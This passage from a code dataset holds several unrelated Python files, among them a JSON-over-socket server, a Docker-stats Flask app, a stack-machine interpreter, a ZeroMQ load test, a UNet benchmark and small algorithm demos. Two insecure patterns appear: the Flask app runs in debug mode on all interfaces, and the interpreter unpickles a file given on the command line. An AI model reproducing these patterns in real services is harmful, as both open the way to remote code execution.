RuntimeError(\"Peer closed.\")\n\n def _write(self):\n \"\"\"Write via the socket's send.\n \"\"\"\n if self._send_buffer:\n print(\"sending\", repr(self._send_buffer), \"to\", self.addr)\n try:\n # Should be ready to write\n sent = self.sock.send(self._send_buffer)\n except BlockingIOError:\n # Resource temporarily unavailable (errno EWOULDBLOCK)\n pass\n else:\n self._send_buffer = self._send_buffer[sent:]\n # Close when the buffer is drained. The response has been sent.\n if sent and not self._send_buffer:\n\n # logger.debug(f'write finished, closing current socket {self.addr}')\n # self.close()\n pass\n\n def _json_encode(self, obj, encoding):\n \"\"\"Encode the response content.\n \"\"\"\n return json.dumps(obj, ensure_ascii=False).encode(encoding)\n\n def _json_decode(self, json_bytes, encoding):\n \"\"\"Decode the data when receiving text or JSON.\n \"\"\"\n tiow = io.TextIOWrapper(\n io.BytesIO(json_bytes), encoding=encoding, newline=\"\"\n )\n obj = json.load(tiow)\n tiow.close()\n return obj\n\n def _create_message(self, *, content_bytes, content_type, content_encoding):\n \"\"\"Wrap the response as a single message.\n \"\"\"\n jsonheader = {\n \"byteorder\": sys.byteorder,\n \"content-type\": content_type,\n \"content-encoding\": content_encoding,\n \"content-length\": len(content_bytes),\n }\n jsonheader_bytes = self._json_encode(jsonheader, \"utf-8\")\n message_hdr = struct.pack(\">H\", len(jsonheader_bytes))\n message = message_hdr + jsonheader_bytes + content_bytes\n return message\n\n def _create_response_json_content(self):\n \"\"\"Create a text/json type response.\n \"\"\"\n # logger.debug(\"creating response ~~~\")\n type = self.request.get(\"type\")\n instance = API()\n answer = f'Error: invalid request {self.request}'\n\n if type == \"get\": # query request\n method = self.request.get(\"method\")\n if method == \"select_topics\":\n exchangeno = self.request.get(\"exchangeno\")\n commoditytype = self.request.get(\"commoditytype\")\n commodityno = self.request.get(\"commodityno\")\n contractno = self.request.get(\"contractno\")\n begin = self.request.get(\"begin\")\n end = self.request.get(\"end\")\n try:\n logger.info(f\"select request: {exchangeno, commoditytype, commodityno, contractno, begin, end}\")\n ret = instance.select(exchangeno, commoditytype, commodityno, contractno, begin, end)\n answer = [json.loads(r) for r in ret]\n except Exception as e:\n answer = f\"select_topics failed, reason: {e}\"\n elif method == \"active_topics\":\n answer = instance.get_active_topic\n elif method == \"exists_topics\":\n answer = instance.get_exists_topic\n\n content = {\"result\": answer}\n content_encoding = \"utf-8\"\n response = {\n \"content_bytes\": self._json_encode(content, content_encoding),\n \"content_type\": \"text/json\",\n \"content_encoding\": content_encoding,\n }\n return response\n\n def _create_response_binary_content(self):\n \"\"\"Create a binary type response.\n \"\"\"\n response = {\n \"content_bytes\": b\"First 10 bytes of request: \"\n + self.request[:10],\n \"content_type\": \"binary/custom-server-binary-type\",\n \"content_encoding\": \"binary\",\n }\n return response\n\n def process_events(self, mask):\n \"\"\" Entry point for server-side messages:\n the server dispatches \"read\" or \"write\" events according to the mask\n \"\"\"\n if mask & selectors.EVENT_READ:\n self.read()\n if mask & selectors.EVENT_WRITE:\n self.write()\n\n def read(self):\n \"\"\"Read the message, setting each piece of state in turn.\n \"\"\"\n self._read()\n\n if self._jsonheader_len is None:\n self.process_protoheader()\n\n if self._jsonheader_len is not None:\n if self.jsonheader is None:\n self.process_jsonheader()\n\n if self.jsonheader:\n if self.request is None:\n self.process_request()\n\n def write(self):\n \"\"\"The server is ready to write.\n \"\"\"\n if self.request is not None: # means the request has been fully read\n if not self.response_created:\n self.create_response()\n self._write()\n\n def close(self):\n \"\"\"Close the connection.\n \"\"\"\n print(\"closing connection to\", self.addr)\n try:\n self.selector.unregister(self.sock)\n except Exception as e:\n print(\n f\"error: selector.unregister() exception for\",\n f\"{self.addr}: {repr(e)}\",\n )\n\n try:\n self.sock.close()\n except OSError as e:\n print(\n f\"error: socket.close() exception for\",\n f\"{self.addr}: {repr(e)}\",\n )\n finally:\n # Delete reference to socket object for garbage collection\n self.sock = None\n\n def process_protoheader(self):\n \"\"\"Read out the length of the header message.\n \"\"\"\n hdrlen = 2\n # once at least two bytes have been read, the first two bytes can be parsed to get the header length\n if len(self._recv_buffer) >= hdrlen:\n self._jsonheader_len = struct.unpack(\n \">H\", self._recv_buffer[:hdrlen]\n )[0]\n self._recv_buffer = self._recv_buffer[hdrlen:]\n\n def process_jsonheader(self):\n \"\"\"Once the header length is known, the header message can be read.\n \"\"\"\n hdrlen = self._jsonheader_len\n if len(self._recv_buffer) >= hdrlen:\n self.jsonheader = self._json_decode(\n self._recv_buffer[:hdrlen], \"utf-8\"\n )\n self._recv_buffer = self._recv_buffer[hdrlen:]\n for reqhdr in (\n \"byteorder\",\n \"content-length\",\n \"content-type\",\n \"content-encoding\",\n ):\n if reqhdr not in self.jsonheader:\n raise ValueError(f'Missing required header \"{reqhdr}\".')\n\n def process_request(self):\n \"\"\"Parse the header message and get the actual request body.\n \"\"\"\n content_len = self.jsonheader[\"content-length\"]\n # not enough of the message has been read yet\n if not len(self._recv_buffer) >= content_len:\n return\n data = self._recv_buffer[:content_len]\n logger.debug(f\"data: {data}\")\n # reset the receive buffer\n self._recv_buffer = self._recv_buffer[content_len:]\n # determine the type of received data\n if self.jsonheader[\"content-type\"] == \"text/json\":\n encoding = self.jsonheader[\"content-encoding\"]\n self.request = self._json_decode(data, encoding)\n logger.info(f\"received request {self.request} from {self.addr}\")\n else:\n # Binary or unknown content-type\n self.request = data\n logger.info(f'received {self.jsonheader[\"content-type\"]} request from {self.addr}')\n # Set selector to listen for write events, we're done reading.\n # after reading, reset the event manager's listening mode\n self._set_selector_events_mask(\"w\")\n\n def create_response(self):\n \"\"\"Create a response according to the request type (json or binary), wrap it as a message and put it in the send buffer.\n \"\"\"\n if self.jsonheader[\"content-type\"] == \"text/json\":\n response = self._create_response_json_content()\n else:\n # Binary or unknown content-type\n response = self._create_response_binary_content()\n logger.debug(f\"created reply message: {response}\")\n message = self._create_message(**response)\n self.response_created = True\n self._send_buffer += message\n","sub_path":"libserver.py","file_name":"libserver.py","file_ext":"py","file_size_in_byte":10187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"474188898","text":"from flask import Flask\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom lib.DataStorage import DataStorage\nfrom lib.StatUtils import StatUtils\nimport docker\nimport logging\n\napp = Flask('docker-stats-to-influx')\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\ndef store_docker_stats():\n client = docker.from_env()\n for con in client.containers.list():\n stats = con.stats(stream=False)\n container_name = stats[\"name\"]\n DataStorage.put(container_name, StatUtils.get_stat_values(stats))\n client.close()\n\nif __name__ == \"__main__\":\n sched = BackgroundScheduler(daemon=True)\n sched.add_job(store_docker_stats, 'interval', seconds=5)\n sched.start()\n app.run(host='0.0.0.0', port=5556, debug=True, threaded=True)\n\n\n\n","sub_path":"App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"528069598","text":"class Solution:\n def findTheWinner(self, n: int, k: int) -> int:\n q = [i 
for i in range(n, 0, -1)]\n while len(q) > 1:\n for i in range(k - 1):\n q.insert(0, q.pop())\n q.pop()\n\n return q[0]\n\n def findTheWinner2(self, n: int, k: int) -> int:\n ans = 0\n for i in range(1, n + 1):\n ans = (ans + k) % i\n return ans + 1\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.findTheWinner(5, 2))\n print(s.findTheWinner2(5, 2))\n","sub_path":"leetcode/medium/find-the-winner-of-the-circular-game.py","file_name":"find-the-winner-of-the-circular-game.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"162343581","text":"# -*- coding: utf-8 -*- \nEVAL_VER = 'v0.10 20.07.09'\nimport copy\nfrom fractions import Fraction\nfrom hedder import *\n\n#STOP, LDC, LD, INC, DEC, ADD, SUB, MUL, DIV, MOD, IDIV, POW, EQ, NEQ,\\\n#GT, LT ,GEQ, LEQ, SET, CALL, TCALL, RTN, SEL, TSEL, JOIN, VEC, VSET, \\\n#REF, DICT, TSET, APL, TAPL, LDF, LDICT, LDM, LDM_CL = range(36)\n\n#INST_CODE = [\n# 'STOP','LDC','LD','INC','DEC','ADD','SUB','MUL','DIV','MOD','IDIV','POW','EQ','NEQ',\n# 'GT','LT','GEQ','LEQ','SET','CALL','TCALL','RTN','SEL','TSEL','JOIN','VEC','VSET',\n# 'REF','DICT','TSEL','APL','TAPL','LDF','LDICT','LDM','LDM_CL',\n# ]\n\ndef eval(S, E, C, cp, R, EE, G):\n #print(S, E,C , cp, R, EE)\n while True:\n inst = C[cp]\n #print('S:', S)\n #print('C:', C[cp:])i\n #print(E)\n #if not ('z' in E[0]):\n #print(inst)\n if inst == 'STOP':\n #print(S, R)\n #return S[ - 1]\n #return S.pop()\n return S\n cp += 1\n if inst == 'LDC':\n #\n if C[cp] == []:S.append([])\n else:S.append(C[cp])\n cp += 1\n elif inst == 'LD' : # ,LD (n,m) \n n, m = C[cp]\n #print(n,m)\n cp +=1\n if m<0:S.append(E[n][-m-1:])\n else:S.append(E[n][m])\n #elif inst == 'LD-' : # ,LD (n,m) the m<0 case was split into a separate instruction\n # n, m = C[cp]\n # #print(n,m)\n # cp +=1\n # S.append(E[n][-m+1:])\n elif inst == 'LDG': # ,LDG val,\n val = C[cp]\n if val in G:\n S.append(G[val])\n #print(\"key=\",val, \" val=\",G[val])\n #C=C[:]\n #C[cp-1]='LDC'\n #C[cp]=G[val]\n #print(\"change_code:\",C[cp-1],C[cp])\n cp+=1\n else: raise KeyError('name '+val+' is not defined')\n elif inst == 'INC':\n S[ - 1] += 1\n elif inst == 'DEC':\n S[ - 1] -= 1\n elif inst == 'MINUS':\n S[ - 1] = - S[ - 1]\n elif inst == 'NOT':\n S[ - 1] = not S[ - 1]\n elif inst == 'ADD':\n S[ - 2] += S[ - 1]\n del(S[ - 1])\n #S.append(S.pop() + S.pop())\n elif inst == 'SUB':\n S[ - 2] -= S[ - 1]\n del(S[ - 1])\n elif inst == 'MUL':\n S[ - 2] *= S[ - 1]\n del(S[ - 1])\n elif inst == 'DIV':\n if isinstance(S[ - 2], int) and isinstance(S[ - 1], int):S[ - 2] = Fraction(S[ - 2], S[ - 1])\n else:S[ - 2] /= S[ - 1]\n del(S[ - 1])\n elif inst == 'MOD':\n S[ - 2] %= S[ - 1]\n del(S[ - 1])\n elif inst == 'IDIV':\n S[ - 2] //= S[ - 1]\n del(S[ - 1])\n elif inst == 'POW':\n S[ - 2] = S[ - 2] ** S[ - 1]\n del(S[ - 1])\n elif inst == 'EQ':\n S[ - 2] = (S[ - 2] == S[ - 1])\n del(S[ - 1])\n elif inst == 'NEQ':\n S[ - 2] = (S[ - 2] != S[ - 1])\n del(S[ - 1])\n elif inst == 'GEQ':\n S[ - 2] = S[ - 2] >= S[ - 1]\n del(S[ - 1])\n elif inst == 'LEQ':\n S[ - 2] = S[ - 2] <= S[ - 1]\n del(S[ - 1])\n elif inst == 'GT':\n S[ - 2] = S[ - 2] > S[ - 1]\n del(S[ - 1])\n elif inst == 'LT':\n S[ - 2] = S[ - 2] < S[ - 1]\n del(S[ - 1])\n elif inst == 'IS':\n S[ - 2] = S[ - 2] is S[ - 1]\n del(S[ - 1])\n elif inst == 'IN':\n S[ - 2] = S[ - 2] in S[ - 1]\n del(S[ - 1])\n elif inst == 'AND':\n S[ - 2] = S[ - 2] & S[ - 1 ]\n del(S[ - 1])\n elif inst == 'OR':\n S[ - 2] = S[ - 2] | S[ - 1 ]\n del(S[ - 1])\n elif inst == 'XOR':\n 
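# like the other binary ops: fold the top two stack values into one result\n 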
S[ - 2] = S[ - 2] ^ S[ - 1 ]\n del(S[ - 1])\n elif inst == 'SHR':\n S[ - 2] = S[ - 2] >> S[ - 1 ]\n del(S[ - 1])\n elif inst == 'SHL':\n S[ - 2] = S[ - 2] << S[ - 1 ]\n del(S[ - 1])\n elif inst == 'BNOT':\n S[ - 1] = ~S[ - 1 ]\n elif inst == 'VEC':\n n = C[cp]\n cp += 1\n v = S[ - n:]\n del(S[ - n:])\n S.append(v)\n elif inst == 'REF':\n ref = S.pop()\n t = S.pop()\n S.append(t[ref])\n elif inst == 'SLS':\n sl_s = S.pop()\n sl_e = S.pop()\n t = S.pop()\n S.append(t[sl_s:sl_e])\n elif inst == 'TCALL': \n n = C[cp]\n cp += 1\n fn = S.pop()\n l = []\n if n != 0:\n #l = copy.deepcopy(S[ - n:]) # deep copy is overkill! copying each element individually would be preferable\n l = (S[ - n:]) \n del(S[ - n:])\n #for i in range(n):\n # l = [S.pop()] + l\n #if type(fn) == list and fn[0] == 'CL':\n if isinstance(fn,Userfunction):\n E = [l] + fn[2]\n C = fn[1] \n cp = 0\n #elif type(fn) == list and fn[0] == 'CONT':\n elif isinstance(fn,Continuation):\n S, E, C, R, EE = fn[1] + l, fn[2][:], fn[3], fn[4][:], fn[5][:]\n cp = 0\n elif n == 0:S.append(fn())\n elif n == 1:S.append(fn(l[0]))\n else: S.append(fn( * l))\n elif inst == 'CALL': \n n = C[cp]\n cp += 1\n fn = S.pop()\n l = []\n if n != 0:\n #l = copy.deepcopy(S[ - n:])\n l = S[ - n:]\n del(S[ - n:])\n #for i in range(n):\n # l = [S.pop()] + l\n #if type(fn) == list and fn[0] == 'CL':\n if isinstance(fn,Userfunction):\n R.append([C, cp])\n EE.append(E)\n E = [l] + fn[2]\n C = fn[1] \n cp = 0\n #elif type(fn) == list and fn[0] == 'CONT':\n elif isinstance(fn,Continuation):\n S, E, C, R, EE = fn[1] + l, fn[2][:], fn[3], fn[4][:], fn[5][:]\n #print(fn[2])\n cp = 0\n elif n == 0:S.append(fn())\n elif n == 1:S.append(fn(l[0]))\n else: S.append(fn( * l))\n elif inst == 'TAPL': \n n = C[cp]\n cp += 1\n fn, l = S[ - n ], S[ - n + 1 : - 1] + S[ - 1]\n del(S[ - n:])\n #print(fn, l)\n #if type(fn) == list and fn[0] == 'CL':\n if isinstance(fn,Userfunction):\n E = [l] + fn[2]\n C = fn[1] \n cp = 0\n #elif type(fn) == list and fn[0] == 'CONT':\n elif isinstance(fn,Continuation):\n S, E, C, R, EE = fn[1] + l, fn[2][:], fn[3], fn[4][:], fn[5][:]\n cp = 0\n elif n == 0:S.append(fn())\n elif n == 1:S.append(fn(l[0]))\n else: S.append(fn( * l))\n elif inst == 'APL': \n n = C[cp]\n cp += 1\n fn, l = S[ - n ], S[ - n + 1 : - 1] + S[ - 1]\n del(S[ - n:])\n #print(fn, l)\n #if type(fn) == list and fn[0] == 'CL':\n if isinstance(fn,Userfunction):\n R.append([C, cp])\n EE.append(E)\n E = [l] + fn[2]\n C = fn[1] \n cp = 0\n #elif type(fn) == list and fn[0] == 'CONT':\n elif isinstance(fn,Continuation):\n S, E, C, R, EE = fn[1] + l, fn[2][:], fn[3], fn[4][:], fn[5][:]\n cp = 0\n elif n == 0:S.append(fn())\n elif n == 1:S.append(fn(l[0]))\n else: S.append(fn( * l))\n elif inst == 'RTN':\n E = EE.pop()\n C, cp = R.pop()\n elif inst=='SET': # value,set (n,m)\n n, m = C[cp]\n cp += 1\n E[n][m] = S[-1]\n elif inst == 'GSET': # value, gset key \n key = C[cp]\n val = S[ - 1]\n #print( \"val = \", v)\n #print(\"key = \", k)\n cp += 1\n G[key] = val\n elif inst == 'VSET': # value, vec, ind, vset \n ind = S.pop()\n vec = S.pop()\n val = S[ - 1]\n vec[ind] = val\n elif inst == 'DCL':\n k = C[cp]\n cp += 1\n E[0][k] = None\n S.append(None)\n elif inst == 'TSEL':\n p = S.pop()\n t_exp = C[cp]\n f_exp = C[cp + 1]\n cp += 2\n #R.append([C, cp])\n cp = 0\n if p is False: C = f_exp #!!! NOTE !!! anything other than False is treated as True !!!\n else: C = t_exp\n elif inst == 'SEL':\n p = S.pop()\n t_exp = C[cp]\n f_exp = C[cp + 1]\n cp += 2\n R.append([C, cp])\n cp = 0\n if p is False: C = f_exp\n else: C = t_exp\n elif inst == 'WHILE':\n p = S.pop()\n back = 
C[cp]\n loop_exp = C[cp + 1]\n if p:\n R.append([C, cp - back - 1])\n #print(C[cp - back - 1])\n C = loop_exp\n cp = 0\n else:\n cp = cp + 2 \n S.append(None)\n #print(C[cp])\n elif inst == 'JOIN':\n C, cp =R.pop() \n elif inst == 'LDF':\n k = C[cp + 1]\n #print(k)\n S.append(Userfunction(['CL', C[cp], E]))\n cp +=1 \n elif inst == 'LDICT':\n S.append(Continuation(['CONT', S[:], E[:], C[cp], R[:], EE[:]]))\n cp += 1\n elif inst == 'LDM': #############################\n S.append(Macro(['MACRO', C[cp]]))\n cp += 1\n elif inst == 'LDM_CL': #############################\n S.append(Macro(['MACRO_CL', C[cp], C[cp + 1], E]))\n cp += 2\n elif inst == 'DICT':\n n = C[cp]//2\n cp += 1\n d={}\n for i in range(n):\n k=S.pop()\n if isinstance(k,list):k=tuple(k)\n v=S.pop()\n d[k] = v\n S.append(d)\n elif inst == 'POP':\n del(S[ -1])\n #elif inst == '__CODE__':\n # S.append('Continuation!')\n else:\n print(inst)\n #print(E)\n raise KeyError('Unknown Code:' + inst)\n\nimport pickle\nimport sys\n \nif __name__ == '__main__':\n args = sys.argv\n if len(args)>1:\n f=open(args[1],'rb') # pickle requires binary mode\n c,g = pickle.load(f)\n eval([],[],c,0,[],[],g) # (c, g) assumed to be (code, globals dict)\n","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":10758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"249843935","text":"# coding:utf-8\nfrom txzmq import ZmqEndpoint, ZmqREQConnection, ZmqRequestTimeoutError\nfrom twisted.internet import reactor\nimport time\nimport zmq\nfrom ZmqFactory import ZmqFactory\nimport json\n\nip = 'tcp://10.10.0.233:8880'\ns_ip = 'tcp://10.10.0.233:10000'\nzf = ZmqFactory()\ns = ZmqREQConnection(zf, ZmqEndpoint('connect', ip))\nnum = 0\nsdata = {}\nwith open('block.json', 'r') as f:\n data = f.read()\n data = json.dumps(data) \n sdata['data'] = data\n\nclass Client(object):\n def __init__(self,s,name):\n self.s = s\n self.name = name\n \n def request(self):\n def produce():\n print(\"Requesting from %s\" % (self.name))\n\n try:\n global num\n num += 1 \n print('the num of request: %d' %num)\n global sdata\n sdata['time'] = time.time()\n sdata['name'] = self.name\n print('%.6f' %sdata['time'])\n d = self.s.sendMsg(json.dumps(sdata), timeout=60*5)\n \n def doPrint(reply): # else reply -->list\n print(\"Got reply: %s\" % (reply[0])) # ???\n\n def onTimeout(fail): # except\n fail.trap(ZmqRequestTimeoutError)\n print(\"Timeout on request, is reply server running?\")\n print('switching to other worker: %s' % s_ip)\n \n self.s.shutdown()\n self.s = ZmqREQConnection(zf, ZmqEndpoint('connect', s_ip))\n d.addCallback(doPrint).addErrback(onTimeout)\n except zmq.error.Again:\n print(\"Skipping, no consumers...\")\n #reactor.callLater(20, produce)\n reactor.callWhenRunning(produce)\n\n\ndef generate_c():\n c_list = []\n for i in range(1000):\n print(i)\n global s\n s = ZmqREQConnection(zf, ZmqEndpoint('connect', ip))\n names = locals()\n name = 'client-%s' % (i+1)\n names[name] = Client(s, name)\n c_list.append(names[name])\n return c_list\n\n\ndef test():\n start = time.time()\n print('begin: ', start)\n for c in generate_c():\n #print(getattr())\n c.request()\n end = time.time()\n print('end: ', end)\n print('total time: %s' % (end-start))\n\nreactor.callWhenRunning(test)\nreactor.run()\n","sub_path":"txZMQ_test/final/test_txzmq/test_serverby.py","file_name":"test_serverby.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"187527154","text":"from typing import Any, Callable, Dict, 
List, Optional, Tuple, cast\nimport sys\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torch.optim import SGD\nfrom torch.utils.data import Dataset, DataLoader\nimport time\nfrom unet import unet\nimport click\n\n# Parameters and DataLoaders\ninput_size = 5\noutput_size = 2\n\nbatch_size = 64\ndataset_size = 640\n\n######################################################################\nBASE_TIME: float = 0\nepochs = 5\nskip_epochs = 1\ntitle = 'data_parallel'\nsave_file = 'unet_data_parallel_stats.csv'\nexperiment = title\ncmd_params = sys.argv\nif len(cmd_params) < 2:\n raise ValueError(\"Expected 1 command line parameter, got none.\")\nparallelism = int(cmd_params[1]) # argv values are strings\n######################################################################\n# Device\n#\ndef max_gpu_devices():\n devices = []\n if torch.cuda.is_available():\n devices = list(range(torch.cuda.device_count()))\n return devices\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\ndevices = []\nin_device = None\nout_device = None\n\nmax_devices = max_gpu_devices()\nif parallelism > len(max_devices):\n raise ValueError(\"Parallelism {} exceeds the maximum number of devices {}\".format(parallelism, len(max_devices)))\nelse:\n devices = list(range(parallelism))\nin_device = devices[0]\nout_device = devices[-1]\n\n\n######################################################################\n# Dummy DataSet\n# -------------\n#\n# Make a dummy (random) dataset. You just need to implement the\n# getitem\n#\n\n\nclass RandomDataset(Dataset):\n\n def __init__(self, batch_size, dataset_size):\n input = torch.rand(3, 192, 192, device=in_device)\n target = torch.ones(1, 192, 192, device=out_device)\n data = [(input, target)] * dataset_size\n\n self.len = dataset_size\n self.data = data\n\n def __getitem__(self, index):\n return self.data[index]\n\n def __len__(self):\n return self.len\n\n\ndata = DataLoader(dataset=RandomDataset(batch_size, dataset_size),\n batch_size=batch_size, shuffle=True)\n\n######################################################################\n# Simple Model\n# ------------\n#\n# For the demo, our model just gets an input, performs a linear operation, and\n# gives an output. However, you can use ``DataParallel`` on any model (CNN, RNN,\n# Capsule Net etc.)\n#\n# We've placed a print statement inside the model to monitor the size of input\n# and output tensors.\n# Please pay attention to what is printed at batch rank 0.\n#\n\n\nmodel: nn.Module = unet(depth=5, num_convs=5, base_channels=64,\n input_channels=3, output_channels=1)\n\noptimizer = SGD(model.parameters(), lr=0.1)\n\n\n######################################################################\n# Create Model and DataParallel\n# -----------------------------\n#\n# This is the core part of the tutorial. First, we need to make a model instance\n# and check if we have multiple GPUs. If we have multiple GPUs, we can wrap\n# our model using ``nn.DataParallel``. Then we can put our model on GPUs by\n# ``model.to(device)``\n#\n\n\nif torch.cuda.device_count() > 1:\n print(\"Let's use\", torch.cuda.device_count(), \"GPUs!\")\n # dim = 0 [30, xxx] -> [10, ...], [10, ...], [10, ...] 
on 3 GPUs\n model = nn.DataParallel(module=model, device_ids=devices)\n#\n model.to(device)\n\n\n######################################################################\n# Run the Model\n# -------------\n#\n# Now we can see the sizes of input and output tensors.\n#\n\n# for i, (input, target) in enumerate(data):\n# print(i, input.shape, target.shape)\n#\n#\n\n\ndef hr() -> None:\n \"\"\"Prints a horizontal line.\"\"\"\n width, _ = click.get_terminal_size()\n click.echo('-' * width)\n\n\ndef log(msg: str, clear: bool = False, nl: bool = True) -> None:\n \"\"\"Prints a message with elapsed time.\"\"\"\n if clear:\n # Clear the output line to overwrite.\n width, _ = click.get_terminal_size()\n click.echo('\\b\\r', nl=False)\n click.echo(' ' * width, nl=False)\n click.echo('\\b\\r', nl=False)\n\n t = time.time() - BASE_TIME\n h = t // 3600\n t %= 3600\n m = t // 60\n t %= 60\n s = t\n\n click.echo('%02d:%02d:%02d | ' % (h, m, s), nl=False)\n click.echo(msg, nl=nl)\n\n\ndef synch_for_all_devices():\n for dv in devices:\n torch.cuda.synchronize(dv)\n\n\ndef run_epoch(epoch: int) -> Tuple[float, float, float, float, float, float]:\n synch_for_all_devices()\n tick = time.time()\n\n data_trained = 0\n forward_time = []\n backward_time = []\n loss_time = []\n opt_time = []\n for i, (input, target) in enumerate(data):\n input = input.to(device)\n target = target.to(device)\n data_trained += input.size(0)\n\n synch_for_all_devices()\n t1 = time.time()\n output = model(input)\n synch_for_all_devices()\n forward_time.append(time.time() - t1)\n\n synch_for_all_devices()\n t1 = time.time()\n loss = F.binary_cross_entropy_with_logits(output, target)\n synch_for_all_devices()\n loss_time.append(time.time() - t1)\n\n synch_for_all_devices()\n t1 = time.time()\n loss.backward()\n synch_for_all_devices()\n backward_time.append(time.time() - t1)\n\n synch_for_all_devices()\n t1 = time.time()\n optimizer.step()\n optimizer.zero_grad()\n synch_for_all_devices()\n opt_time.append(time.time() - t1)\n\n # 00:01:02 | 1/20 epoch (42%) | 200.000 samples/sec (estimated)\n percent = (i + 1) / len(data) * 100\n throughput = data_trained / (time.time() - tick)\n log('%d/%d epoch (%d%%) | %.3f samples/sec (estimated)'\n '' % (epoch + 1, epochs, percent, throughput), clear=True,\n nl=False)\n\n synch_for_all_devices()\n tock = time.time()\n\n # 00:02:03 | 1/20 epoch | 200.000 samples/sec, 123.456 sec/epoch\n elapsed_time = tock - tick\n throughput = data_trained / elapsed_time\n log('%d/%d epoch | %.3f samples/sec, %.3f sec/epoch'\n '' % (epoch + 1, epochs, throughput, elapsed_time), clear=True)\n\n return throughput, elapsed_time, sum(forward_time), \\\n sum(backward_time), sum(loss_time), sum(opt_time)\n\n\n#global BASE_TIME\nBASE_TIME = time.time()\n\n# for id, data in enumerate(rand_loader):\n# input = data[0]\n# target = data[1]\n# input = input.to(device)\n# target = target.to(device)\n\n# for data in rand_loader:\n# input = data.to(device)\n# output = model(input)\n# print(\"Outside: input size\", input.size(),\n# \"output_size\", output.size())\n\n\nthroughputs = []\nelapsed_times = []\nforward_times = []\nbackward_times = []\nloss_times = []\nopt_times = []\n\nhr()\nsynch_for_all_devices()\nt1 = time.time()\nfor epoch in range(epochs):\n throughput, elapsed_time, forward_time, backward_time, loss_time, opt_time = run_epoch(epoch)\n\n if epoch < skip_epochs:\n continue\n\n throughputs.append(throughput)\n elapsed_times.append(elapsed_time)\n forward_times.append(forward_time)\n backward_times.append(backward_time)\n 
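# these per-epoch sums are averaged over the measured epochs in the final report\n 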
loss_times.append(loss_time)\n opt_times.append(opt_time)\nhr()\nsynch_for_all_devices()\nt2 = time.time()\n\n# RESULT ======================================================================================\n\n# pipeline-4, 2-10 epochs | 200.000 samples/sec, 123.456 sec/epoch (average)\nn = len(throughputs)\nthroughput = sum(throughputs) / n\nelapsed_time = sum(elapsed_times) / n\nforward_avg_time = sum(forward_times) / n\nbackward_avg_time = sum(backward_times) / n\nloss_avg_time = sum(loss_times) / n\nopt_avg_time = sum(opt_times) / n\nclick.echo('%s | %.3f samples/sec, %.3f sec/epoch (average)'\n '' % (title, throughput, elapsed_time))\nclick.echo('Average Time Per Epoch {}'.format((t2-t1)/epochs))\n\nif save_file is not None:\n with open(save_file, \"a+\") as fp:\n fp.write(\n \"{},{},{},{},{},{},{},{},{},{}\\n\".format(experiment, parallelism, dataset_size,\n batch_size, throughput,\n elapsed_time, forward_avg_time,\n backward_avg_time, loss_avg_time, opt_avg_time))","sub_path":"benchmarks/unet-speed-batch/main_data_parallel.py","file_name":"main_data_parallel.py","file_ext":"py","file_size_in_byte":8197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"280096872","text":"# function to find waiting time for all the processes\ndef findWaitingTime(processes, n, bt, wt):\n # waiting time for first process is 0\n wt[0] = 0\n # calculate waiting time\n for i in range(1, n):\n wt[i] = bt[i - 1] + wt[i - 1]\n\n\n# function to calculate turn around time\ndef findTurnAroundTime(processes, n, bt, wt, tat):\n # calculate turnaround time by adding bt[i]+wt[i]\n\n for i in range(n):\n tat[i] = bt[i] + wt[i]\n\n\n# function to calculate average time\ndef findavgTime(processes, n, bt):\n wt = [0] * n\n tat = [0] * n\n total_wt = 0\n total_tat = 0\n\n # function to find waiting time of all processes\n findWaitingTime(processes, n, bt, wt)\n\n # function to find turnaround time\n findTurnAroundTime(processes, n, bt, wt, tat)\n\n # display processes along with all details\n print(\"processes Burst Time \" + \" waiting time \" + \"turn around time\")\n\n # calculate total waiting time and total turn around time\n for i in range(n):\n\n total_wt = total_wt + wt[i]\n total_tat = total_tat + tat[i]\n print(\" \" + str(i + 1) + \"\\t\\t\" + str(bt[i]) + \"\\t\" + str(wt[i]) + \"\\t\\t\" + str(tat[i]))\n\n print(\"average waiting time is \" + str(total_wt / n))\n print(\"average turnaround time is \" + str(total_tat / n))\n\n\n# source code\nif __name__ == \"__main__\": #while writing main write carefully\n processes = [1, 2, 3, 4, 5, 6, 7]\n n = len(processes)\n\n burst_time = [10, 5, 8, 8, 7, 4, 3]\n\n findavgTime(processes, n, burst_time)\n","sub_path":"sjf.py","file_name":"sjf.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"291160501","text":"# Test the PBM reading on the SPI_LCD12864 LCD graphical screen 128x64\n#\n# bpm & img libraries: https://github.com/mchobby/esp8266-upy/tree/master/FILEFORMAT/imglib\n# lcd12864 library: https://github.com/mchobby/esp8266-upy/tree/master/lcdspi-lcd12864/lib\n# mpy.pbm : image bitmap of older MicroPython logo\n#\n# LCD12864 hardware: https://shop.mchobby.be/fr/gravity-boson/1878-afficheur-lcd-128x64-spi-3-fils-3232100018785-dfrobot.html\n#\n\nfrom machine import SPI, Pin\nfrom lcd12864 import SPI_LCD12864\nfrom img import open_image\nimport time\n\n# PYBStick: S19=mosi, S23=sck, S26=/ss\ncs = Pin( 'S26', Pin.OUT, 
